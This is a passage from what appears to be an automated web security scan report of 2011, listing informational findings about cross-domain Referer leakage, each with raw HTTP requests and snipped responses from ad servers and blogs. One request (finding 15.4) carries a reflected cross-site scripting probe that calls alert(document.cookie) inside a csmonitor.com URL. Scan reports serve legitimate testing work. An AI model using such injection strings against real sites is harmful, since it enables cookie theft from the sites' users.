Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


15.1. http://ads.bluelithium.com/st  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.bluelithium.com
Path:   /st

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /st?ad_type=iframe&ad_size=1x1&section=1603038 HTTP/1.1
Host: ads.bluelithium.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=1099
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:50:47 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Wed, 19 Jan 2011 15:50:47 GMT
Pragma: no-cache
Content-Length: 4543
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=
...[SNIP]...
</noscript><img src="http://content.yieldmanager.com/ak/q.gif" style="display:none" width="1" height="1" border="0" alt="" /></body>
...[SNIP]...

15.2. http://ads.roiserver.com/disp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.roiserver.com
Path:   /disp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /disp?pid=2DFE311&rand=22153025 HTTP/1.1
Host: ads.roiserver.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=2&t=2&sz=300x250&ord=1295459726173&k=law+offices&l=Dallas%2c+TX
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
SAdBuild: 400
P3P: CP="NON DEVa PSAa PSDa OUR NOR NAV",policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 5051
Date: Wed, 19 Jan 2011 17:54:39 GMT
Connection: close


<html>

<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="Expires" content="Tue, 01 Jan 2000 12:12:12 GMT">

...[SNIP]...
<a href="http://ads.roiserver.com/click?clid=41cafe7&rand=1295459680368&sid=" target="_blank">
<img src="http://roiserver.sitescout.netdna-cdn.com/acaiani-83234ed.gif" alt="1 Trick of a Tiny Belly:" border=0/>
</a>
...[SNIP]...
<a href="http://ads.roiserver.com/click?clid=34f5e64&rand=1295459680368&sid=" target="_blank">
<img src="http://roiserver.sitescout.netdna-cdn.com/fext/skin-2.jpg" alt="Dallas Mom's $5 Wrinkle Trick" border=0/>
</a>
...[SNIP]...
<a href="http://ads.roiserver.com/click?clid=b3b11e8&rand=1295459680368&sid=" target="_blank">
<img src="http://roiserver.sitescout.netdna-cdn.com/fext/biz-1.jpg" alt="Dallas Mom Makes $77/hr Online!" border=0/>
</a>
...[SNIP]...

15.3. http://ads.roiserver.com/disp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.roiserver.com
Path:   /disp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /disp?pid=2259860&rand=1577716 HTTP/1.1
Host: ads.roiserver.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/dart/?ag=True&p=locm.sp&pos=11&t=11&sz=300x250&ord=1295459726173&k=law+offices&l=Dallas%2c+TX
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0,no-cache,no-store
Pragma: no-cache
Expires: Tue, 11 Oct 1977 12:34:56 GMT
SAdBuild: 400
P3P: CP="NON DEVa PSAa PSDa OUR NOR NAV",policyref="/w3c/p3p.xml"
Content-Type: text/html
Content-Length: 5075
Date: Wed, 19 Jan 2011 17:54:42 GMT
Connection: close


<html>

<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="Expires" content="Tue, 01 Jan 2000 12:12:12 GMT">

...[SNIP]...
<a href="http://ads.roiserver.com/click?clid=ba4aca2&rand=1295459682528&sid=" target="_blank">
<img src="http://roiserver.sitescout.netdna-cdn.com/tv1-6170fa3.jpg" alt="SHOCKING: 46" LED TV's for only $98.76!" border=0/>
</a>
...[SNIP]...
<a href="http://ads.roiserver.com/click?clid=97424b1&rand=1295459682528&sid=" target="_blank">
<img src="http://roiserver.sitescout.netdna-cdn.com/fext/biz-1.jpg" alt="Dallas Mom Makes $77/hr Online!" border=0/>
</a>
...[SNIP]...
<a href="http://ads.roiserver.com/click?clid=4e66259&rand=1295459682528&sid=" target="_blank">
<img src="http://roiserver.sitescout.netdna-cdn.com/fext/skin-2.jpg" alt="Dallas Mom's $5 Wrinkle Trick" border=0/>
</a>
...[SNIP]...

15.4. http://d7.zedo.com/bar/v16-401/d3/jsc/fmr.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-401/d3/jsc/fmr.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /bar/v16-401/d3/jsc/fmr.js?c=2/1&a=0&f=&n=1099&r=13&d=14&q=&$=&s=1&l=http%3A//adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBMES1Ugg3Ta2nBoyGlges6NynDJnp180BAAAAEAEgjfDlBTgAWKHYjIMWYMmGo4fUo4AQsgERd3d3LmNzbW9uaXRvci5jb226AQk3Mjh4OTBfYXPIAQnaAZIBaHR0cDovL3d3dy5jc21vbml0b3IuY29tL1VTQTFlZGMxJTIyLWFsZXJ0KGRvY3VtZW50LmNvb2tpZSktJTIyOGE1ZTYzNWQ0OC9KdXN0aWNlLzIwMTEvMDExOC9TdXByZW1lLUNvdXJ0LWRlY2xpbmVzLWFwcGVhbC1vZi1ELkMuLWdheS1tYXJyaWFnZS1sYXeYAvQDwAIC4AIA6gIPNzI4eDkwQV9HZW5lcmFs-AL40R6QA-gCmAOkA6gDAeAEAQ%26num%3D0%26sig%3DAGiWqtxRwj24JAE0NIGlaKp_ZowzoLsPwg%26client%3Dca-pub-6743622525202572%26adurl%3D&z=0.14485870278440416 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.csmonitor.com/USA1edc1%22-alert(document.cookie)-%228a5e635d48/Justice/2011/0118/Supreme-Court-declines-appeal-of-D.C.-gay-marriage-law
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; FFgeo=5386156; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1; FFCap=1463B1219,174796|0,11,1; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1;expires=Fri, 18 Feb 2011 15:50:43 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=1099,2,14;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=0;expires=Thu, 20 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "812b9fe7-809a-4989a59833840"
Vary: Accept-Encoding
X-Varnish: 2233582316
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=301
Expires: Wed, 19 Jan 2011 15:55:44 GMT
Date: Wed, 19 Jan 2011 15:50:43 GMT
Connection: close
Content-Length: 2277

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=1;var zzPat='';var zzCusto
...[SNIP]...
</span>")
document.write('<script src="http://a1.interclick.com/getInPageJS.aspx?a=53&b=50020&cid=633862074462733033"> <\/script>
...[SNIP]...

15.5. http://dcregistry.com/cgi-bin/classifieds/classifieds.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dcregistry.com
Path:   /cgi-bin/classifieds/classifieds.cgi

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /cgi-bin/classifieds/classifieds.cgi?db=personals HTTP/1.1
Host: dcregistry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:21:25 GMT
Server: Apache/2.2.11 (Unix) FrontPage/5.0.2.2635 PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 52149

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>
<title>Personals</title>
<meta http-equiv="Content-Type"
...[SNIP]...
<td align="right"><a href="http://www.e-classifieds.net"><img src="http://www.dcregistry.com/graphics/eclassbanner.gif" width="468" height="60" border="1" align="middle" title="Classifieds for every website!" alt="banner" />
...[SNIP]...
</a>|<a
href="http://www.hagenhosting.com" target="_top">
Web Hosting</a>
...[SNIP]...
<td class="regalt" align="center"><a href="http://www.hagenhosting.com"><img alt="Hagen Hosting" width="305" height="44" title="Hagen Hosting: Premium quality web hosting" src="http://www.dcregistry.com/graphics/test3.gif" border="1" />
...[SNIP]...
<font class="reg"><a href="http://www.hagenhosting.com"><img src="http://www.dcregistry.com/graphics/hagen_small2.gif" width="130" height="56" border="1" alt="Premium quality web hosting!" title="Premium quality web hosting!" />
...[SNIP]...
<br />
<a href="http://www.hagenhosting.com">Premium quality web hosting!</a>
...[SNIP]...
<p><a href="http://www.hagenhosting.com"><img src="http://www.dcregistry.com/graphics/hagen_small2.gif" border="1" alt="Premium quality web hosting!" width="130" height="56" title="Premium quality web hosting!" />
...[SNIP]...
<br />
<a href="http://www.hagenhosting.com">Premium quality web hosting!</a>
...[SNIP]...
<td align=right valign="top"><a href="http://www.e-classifieds.net/"><img src="http://www.dcregistry.com/classifieds/graphics/eclass_pre.gif" width=116 height=44 alt="Powered by e-Classifieds" border=0>
...[SNIP]...
<font class="small"><a href="http://www.e-classifieds.net"><img src="http://www.dcregistry.com/graphics/eclassbanner.gif" border="1" align="middle" alt="banner" title="Classifieds for every website!" />
...[SNIP]...
<br />
<a href="http://www.e-classifieds.net">Classifieds for every website!</a>
...[SNIP]...
<i>Copyright &copy; 1995-
2011 <a href="http://www.hagensoftware.com">Hagen Software</a>
...[SNIP]...

15.6. http://dcregistry.com/cgi-bin/surveys/survey.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://dcregistry.com
Path:   /cgi-bin/surveys/survey.cgi

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /cgi-bin/surveys/survey.cgi?db=aad_look&website=&language=&display_past_polls=on HTTP/1.1
Host: dcregistry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:21:28 GMT
Server: Apache/2.2.11 (Unix) FrontPage/5.0.2.2635 PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 47923

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>
<title>General Merchandise</title>
<meta http-equiv="Co
...[SNIP]...
<td align="right"><a href="http://www.e-classifieds.net"><img src="http://www.dcregistry.com/graphics/eclassbanner.gif" width="468" height="60" border="1" align="middle" title="Classifieds for every website!" alt="banner" />
...[SNIP]...
</a>|<a
href="http://www.hagenhosting.com" target="_top">
Web Hosting</a>
...[SNIP]...
<td class="regalt" align="center"><a href="http://www.hagenhosting.com"><img alt="Hagen Hosting" width="305" height="44" title="Hagen Hosting: Premium quality web hosting" src="http://www.dcregistry.com/graphics/test3.gif" border="1" />
...[SNIP]...
<font class="reg"><a href="http://www.hagenhosting.com"><img src="http://www.dcregistry.com/graphics/hagen_small2.gif" width="130" height="56" border="1" alt="Premium quality web hosting!" title="Premium quality web hosting!" />
...[SNIP]...
<br />
<a href="http://www.hagenhosting.com">Premium quality web hosting!</a>
...[SNIP]...
<p><a href="http://www.hagenhosting.com"><img src="http://www.dcregistry.com/graphics/hagen_small2.gif" border="1" alt="Premium quality web hosting!" width="130" height="56" title="Premium quality web hosting!" />
...[SNIP]...
<br />
<a href="http://www.hagenhosting.com">Premium quality web hosting!</a>
...[SNIP]...
<td align=right valign="top"><a href="http://www.e-classifieds.net/"><img src="http://www.dcregistry.com/surveys/graphics/eclass_pre.gif" width=116 height=44 alt="Powered by e-Classifieds" border=0>
...[SNIP]...
<font class="small"><a href="http://www.e-classifieds.net"><img src="http://www.dcregistry.com/graphics/eclassbanner.gif" border="1" align="middle" alt="banner" title="Classifieds for every website!" />
...[SNIP]...
<br />
<a href="http://www.e-classifieds.net">Classifieds for every website!</a>
...[SNIP]...
<i>Copyright &copy; 1995-
2011 <a href="http://www.hagensoftware.com">Hagen Software</a>
...[SNIP]...

15.7. http://financaspessoais.blog.br/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://financaspessoais.blog.br
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?utm_source=blogger&utm_medium=badge&utm_term=rafael-lima&utm_content=232-58&utm_campaign=blogwatch HTTP/1.1
Host: financaspessoais.blog.br
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 18:08:07 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.9 with Suhosin-Patch
X-Powered-By: PHP/5.2.4-2ubuntu5.9
X-Pingback: http://financaspessoais.blog.br/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 207116

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...
</script><script type="text/javascript" id="topsy-js-elem" src="http://cdn.topsy.com/topsy.js?init=topsyWidgetCreator"></script>
...[SNIP]...
<a href="http://financaspessoais.blog.br/" title="Finan..as Pessoais"><img class="fixie" src="http://financaspessoais.s3.amazonaws.com/theme/freshnews/logo.png" width="542" height="105" border="0"/></a>
...[SNIP]...
<h3><img class="fixie" src="http://financaspessoais.s3.amazonaws.com/theme/freshnews/tit-social-links.png" width="335" height="25"/></h3>
...[SNIP]...
<a href="/acompanhe-twitter" class="twitter" name="no Twitter"><img class="fixie" src="http://financaspessoais.s3.amazonaws.com/theme/freshnews/social-links-twitter.png" width="67" height="61" /></a>
...[SNIP]...
<a href="/acompanhe-rss" class="rss" name="por RSS"><img class="fixie" src="http://financaspessoais.s3.amazonaws.com/theme/freshnews/social-links-rss.png" width="67" height="61" /></a>
...[SNIP]...
<a href="/acompanhe-email" class="email" name="por Email"><img class="fixie" src="http://financaspessoais.s3.amazonaws.com/theme/freshnews/social-links-email.png" width="67" height="61" /></a>
...[SNIP]...
<noscript><a href='http://ads.myfreecomm.com.br/delivery/ck.php?n=a65c1bd6&amp;cb=INSERT_RANDOM_NUMBER_HERE' target='_blank'><img src='http://ads.myfreecomm.com.br/delivery/avw.php?zoneid=4&amp;cb=INSERT_RANDOM_NUMBER_HERE&amp;n=a65c1bd6' border='0' alt='' /></a>
...[SNIP]...
<p>
<a href="http://www.financaspraticas.com.br/" target="_blank">
<img align="left" border="0" alt="" src="/wp-content/themes/freshnews/images/powered_financaspraticas.jpg" class="powered_by_financaspraticas"/>
...[SNIP]...
<h2 class="widgettitle"><a class='rsswidget' href='http://www.ultimoinstante.com.br/feed/index.1.rss' title='Assinar este conte..do'><img style='border:0' width='14' height='14' src='http://financaspessoais.blog.br/wp-includes/images/rss.png' alt='RSS' /></a> <a class='rsswidget' href='http://www.ultimoinstante.com.br/' title='ultimoinstante: not..cias'>Not..cias</a>
...[SNIP]...
<li><a class='rsswidget' href='http://www.ultimoinstante.com.br/setores-da-economia/setor-agronegocio/35126-Aes-Minerva-sobem-mais-aps-compra-frigorfico-uruguaio.html' title='H.. pouco, os pap..is subiam 2,18% a R$ 7,04. [&hellip;]'>A....es da Minerva sobem mais de 2%, ap..s compra de frigor..fico uruguaio</a>
...[SNIP]...
<li><a class='rsswidget' href='http://www.ultimoinstante.com.br/economia/35125-Banco-Mundial-anuncia-liberao-485-milhes-para-vtimas-das-chuvas-Rio.html' title='Ontem (18) a presidenta Dilma Rousseff apelou ao comando da institui....o para liberar o dinheiro. Dilma e v..rios ministros reuniram-se com o vice-presidente do Banco Mundial para Redu....o da Pobreza e Gest..o Econ..mica, Otaviano Canuto, e o diretor da institui....o para o Brasil, Makhtar Diop. [&hellip;]'>Banco Mundial anuncia libera....o de US$ 485 milh..es para v..timas das chuvas no Rio</a>
...[SNIP]...
<li><a class='rsswidget' href='http://www.ultimoinstante.com.br/economia/taxa-de-juros/35124-Inflao-alta-economia-aquecida-indicam-elevao-taxa-juros-avalia-professor.html' title='O economista da Business School S..o Paulo (BSP), Daniel Miraglia, prev.. aumento m..nimo de 0,5 ponto percentual na primeira reuni..o do Copom. [&hellip;]'>Infla....o em alta e economia aquecida indicam eleva....o da taxa de juros, avalia professor</a>
...[SNIP]...
<li><a class='rsswidget' href='http://www.ultimoinstante.com.br/economia/mercado-internacional/35123-EUA-China-fecham-acordo-exportao-bilhes.html' title='O an..ncio ocorreu durante a visita do presidente chin..s, Hu Jintao, ao presidente americano, Barack Obama, na Casa Branca. [&hellip;]'>EUA e China fecham acordo de exporta....o de US$ 45 bilh..es</a>
...[SNIP]...
<li><a class='rsswidget' href='http://www.ultimoinstante.com.br/economia/mercado-internacional/35122-Mxico-afirma-que-guerra-cambial-afeta-pas-nem-Brasil.html' title='Para n..s .. muito importante e acompanhamos a quest..o de perto, mas, felizmente, n..o estamos nas mesmas circunst..ncias que os demais pa..ses&quot;, afirmou o secret..rio Bruno Ferrari [&hellip;]'>M..xico afirma que guerra cambial n..o afeta ao pa..s e nem ao Brasil</a>
...[SNIP]...
<div class="avatar">
                                           <a href="http://www.betoveiga.com" target="_blank">
                                       <span class="avatar">
...[SNIP]...
<div class="avatar">
                                           <a href="http://blogs.diariodepernambuco.com.br/economia/" target="_blank">
                                       <span class="avatar">
...[SNIP]...
<div class="avatar">
                                           <a href="http://boszczovskimarket.blogspot.com/" target="_blank">
                                       <span class="avatar">
...[SNIP]...
<div class="avatar">
                                           <a href="http://queroficarrico.com/blog/" target="_blank">
                                       <span class="avatar">
...[SNIP]...
<div class="avatar">
                                           <a href="http://www.banein.com/" target="_blank">
                                       <span class="avatar">
...[SNIP]...
<div class="avatar">
                                           <a href="http://icaroqueiroz.blogspot.com/" target="_blank">
                                       <span class="avatar">
...[SNIP]...
<div class="avatar">
                                           <a href="http://www.planetamoney.com.br" target="_blank">
                                       <span class="avatar">
...[SNIP]...
<div class="avatar">
                                           <a href="http://portalexame.abril.com.br/blogs/pedro_mello/listar1.shtml" target="_blank">
                                       <span class="avatar">
...[SNIP]...
<div class="avatar">
                                           <a href="http://www.efetividade.net/" target="_blank">
                                       <span class="avatar">
...[SNIP]...
<div class="avatar">
                                           <a href="http://brunomassera.blogspot.com/" target="_blank">
                                       <span class="avatar">
...[SNIP]...
<div class="avatar">
                                           <a href="http://www.oguardiaodoseudinheiro.com.br/" target="_blank">
                                       <span class="avatar">
...[SNIP]...
<div class="avatar">
                                           <a href="http://www.fiquericodiariamente.com.br" target="_blank">
                                       <span class="avatar">
...[SNIP]...
<div class="avatar">
                                           <a href="http://estabilidadefinanceira.wordpress.com" target="_blank">
                                       <span class="avatar">
...[SNIP]...
<div class="avatar">
                                           <a href="http://motivadoparaosucesso.blogspot.com/" target="_blank">
                                       <span class="avatar">
...[SNIP]...
<div class="avatar">
                                           <a href="http://www.efetividade.blog.br/" target="_blank">
                                       <span class="avatar">
...[SNIP]...
<div class="avatar">
                                           <a href="http://www.maisativos.com.br" target="_blank">
                                       <span class="avatar">
...[SNIP]...
<div class="avatar">
                                           <a href="http://www.riquezasdavida.blogspot.com/" target="_blank">
                                       <span class="avatar">
...[SNIP]...
<div class="avatar">
                                           <a href="http://ideiasefinancas.blogspot.com" target="_blank">
                                       <span class="avatar">
...[SNIP]...
<div class="avatar">
                                           <a href="http://www.hojeeunaocomprei.com.br/" target="_blank">
                                       <span class="avatar">
...[SNIP]...
<div class="avatar">
                                           <a href="http://clebermiranda.wordpress.com" target="_blank">
                                       <span class="avatar">
...[SNIP]...
<div class="avatar">
                                           <a href="http://soraiascury.blogspot.com" target="_blank">
                                       <span class="avatar">
...[SNIP]...
<div class="avatar">
                                           <a href="http://www.pairico.com" target="_blank">
                                       <span class="avatar">
...[SNIP]...
<div class="avatar">
                                           <a href="http://www.jurocomposto.com.br" target="_blank">
                                       <span class="avatar">
...[SNIP]...
<div class="avatar">
                                           <a href="http://www.economiaclara.wordpress.com" target="_blank">
                                       <span class="avatar">
...[SNIP]...
<div class="avatar">
                                           <a href="http://omundoeconomia.blogspot.com/" target="_blank">
                                       <span class="avatar">
...[SNIP]...
<div class="avatar">
                                           <a href="http://voceeseudinheiro.com/" target="_blank">
                                       <span class="avatar">
...[SNIP]...
<div class="avatar">
                                           <a href="http://www.evoluzione.com.br/blog/" target="_blank">
                                       <span class="avatar">
...[SNIP]...
<div class="avatar">
                                           <a href="http://www.saudedobolso.com/blog/" target="_blank">
                                       <span class="avatar">
...[SNIP]...
<div class="avatar">
                                           <a href="http://www.rendadinheiro.com.br" target="_blank">
                                       <span class="avatar">
...[SNIP]...
<div class="avatar">
                                           <a href="http://blog.consultoriameridiano.com.br/" target="_blank">
                                       <span class="avatar">
...[SNIP]...
<div class="avatar">
                                           <a href="http://www.interney.net/blogs/papoeconomico/" target="_blank">
                                       <span class="avatar">
...[SNIP]...
<div class="avatar">
                                           <a href="http://mademoiselleentrepreneur.blogspot.com/" target="_blank">
                                       <span class="avatar">
...[SNIP]...
<div class="avatar">
                                           <a href="http://controlefinanceirogratis.blogspot.com/" target="_blank">
                                       <span class="avatar">
...[SNIP]...
<div class="avatar">
                                           <a href="http://www.planosfinanceiros.blogspot.com" target="_blank">
                                       <span class="avatar">
...[SNIP]...
<div class="avatar">
                                           <a href="http://carolinasconsulting.blogspot.com/" target="_blank">
                                       <span class="avatar">
...[SNIP]...
<div class="avatar">
                                           <a href="http://www.debitoecredito.blogspot.com" target="_blank">
                                       <span class="avatar">
...[SNIP]...
<div class="avatar">
                                           <a href="http://mauriliolima.wordpress.com" target="_blank">
                                       <span class="avatar">
...[SNIP]...
<div class="avatar">
                                           <a href="http://www.saudedobolso.com/blog/" target="_blank">
                                       <span class="avatar">
...[SNIP]...
<div class="avatar">
                                           <a href="http://www.maisativos.com.br" target="_blank">
                                       <span class="avatar">
...[SNIP]...
<div class="avatar">
                                           <a href="http://carolinasconsulting.blogspot.com/" target="_blank">
                                       <span class="avatar">
...[SNIP]...
<div class="avatar">
                                           <a href="http://www.efetividade.net/" target="_blank">
                                       <span class="avatar">
...[SNIP]...
<div class="avatar">
                                           <a href="http://www.betoveiga.com" target="_blank">
                                       <span class="avatar">
...[SNIP]...
<div class="avatar">
                                           <a href="http://brunomassera.blogspot.com/" target="_blank">
                                       <span class="avatar">
...[SNIP]...
<div class="avatar">
                                           <a href="http://voceeseudinheiro.com/" target="_blank">
                                       <span class="avatar">
...[SNIP]...
<div class="avatar">
                                           <a href="http://boszczovskimarket.blogspot.com/" target="_blank">
                                       <span class="avatar">
...[SNIP]...
<div class="avatar">
                                           <a href="http://clebermiranda.wordpress.com" target="_blank">
                                       <span class="avatar">
...[SNIP]...
<div class="avatar">
                                           <a href="http://www.planosfinanceiros.blogspot.com" target="_blank">
                                       <span class="avatar">
...[SNIP]...
<div class="avatar">
                                           <a href="http://motivadoparaosucesso.blogspot.com/" target="_blank">
                                       <span class="avatar">
...[SNIP]...
<div class="avatar">
                                           <a href="http://www.interney.net/blogs/papoeconomico/" target="_blank">
                                       <span class="avatar">
...[SNIP]...
<div class="avatar">
                                           <a href="http://www.planetamoney.com.br" target="_blank">
                                       <span class="avatar">
...[SNIP]...
<div class="avatar">
                                           <a href="http://mademoiselleentrepreneur.blogspot.com/" target="_blank">
                                       <span class="avatar">
...[SNIP]...
<div class="avatar">
                                           <a href="http://www.evoluzione.com.br/blog/" target="_blank">
                                       <span class="avatar">
...[SNIP]...
<div class="avatar">
                                           <a href="http://icaroqueiroz.blogspot.com/" target="_blank">
                                       <span class="avatar">
...[SNIP]...
<div class="avatar">
                                           <a href="http://www.efetividade.blog.br/" target="_blank">
                                       <span class="avatar">
...[SNIP]...
<div class="avatar">
                                           <a href="http://www.jurocomposto.com.br" target="_blank">
                                       <span class="avatar">
...[SNIP]...
<div class="avatar">
                                           <a href="http://www.banein.com/" target="_blank">
                                       <span class="avatar">
...[SNIP]...
<div class="avatar">
                                           <a href="http://www.economiaclara.wordpress.com" target="_blank">
                                       <span class="avatar">
...[SNIP]...
<div class="avatar">
                                           <a href="http://ideiasefinancas.blogspot.com" target="_blank">
                                       <span class="avatar">
...[SNIP]...
<div class="avatar">
                                           <a href="http://mauriliolima.wordpress.com" target="_blank">
                                       <span class="avatar">
...[SNIP]...
<div class="avatar">
                                           <a href="http://estabilidadefinanceira.wordpress.com" target="_blank">
                                       <span class="avatar">
...[SNIP]...
<div class="avatar">
                                           <a href="http://portalexame.abril.com.br/blogs/pedro_mello/listar1.shtml" target="_blank">
                                       <span class="avatar">
...[SNIP]...
<div class="avatar">
                                           <a href="http://www.riquezasdavida.blogspot.com/" target="_blank">
                                       <span class="avatar">
...[SNIP]...
<div class="avatar">
                                           <a href="http://www.rendadinheiro.com.br" target="_blank">
                                       <span class="avatar">
...[SNIP]...
<div class="avatar">
                                           <a href="http://queroficarrico.com/blog/" target="_blank">
                                       <span class="avatar">
...[SNIP]...
<div class="avatar">
                                           <a href="http://www.debitoecredito.blogspot.com" target="_blank">
                                       <span class="avatar">
...[SNIP]...
<div class="avatar">
                                           <a href="http://www.oguardiaodoseudinheiro.com.br/" target="_blank">
                                       <span class="avatar">
...[SNIP]...
<div class="avatar">
                                           <a href="http://www.pairico.com" target="_blank">
                                       <span class="avatar">
...[SNIP]...
<div class="avatar">
                                           <a href="http://blog.consultoriameridiano.com.br/" target="_blank">
                                       <span class="avatar">
...[SNIP]...
<div class="avatar">
                                           <a href="http://soraiascury.blogspot.com" target="_blank">
                                       <span class="avatar">
...[SNIP]...
<div class="avatar">
                                           <a href="http://www.fiquericodiariamente.com.br" target="_blank">
                                       <span class="avatar">
...[SNIP]...
<div class="avatar">
                                           <a href="http://blogs.diariodepernambuco.com.br/economia/" target="_blank">
                                       <span class="avatar">
...[SNIP]...
<div class="avatar">
                                           <a href="http://www.hojeeunaocomprei.com.br/" target="_blank">
                                       <span class="avatar">
...[SNIP]...
<div class="avatar">
                                           <a href="http://omundoeconomia.blogspot.com/" target="_blank">
                                       <span class="avatar">
...[SNIP]...
<div class="avatar">
                                           <a href="http://controlefinanceirogratis.blogspot.com/" target="_blank">
                                       <span class="avatar">
...[SNIP]...
<div class="avatar">
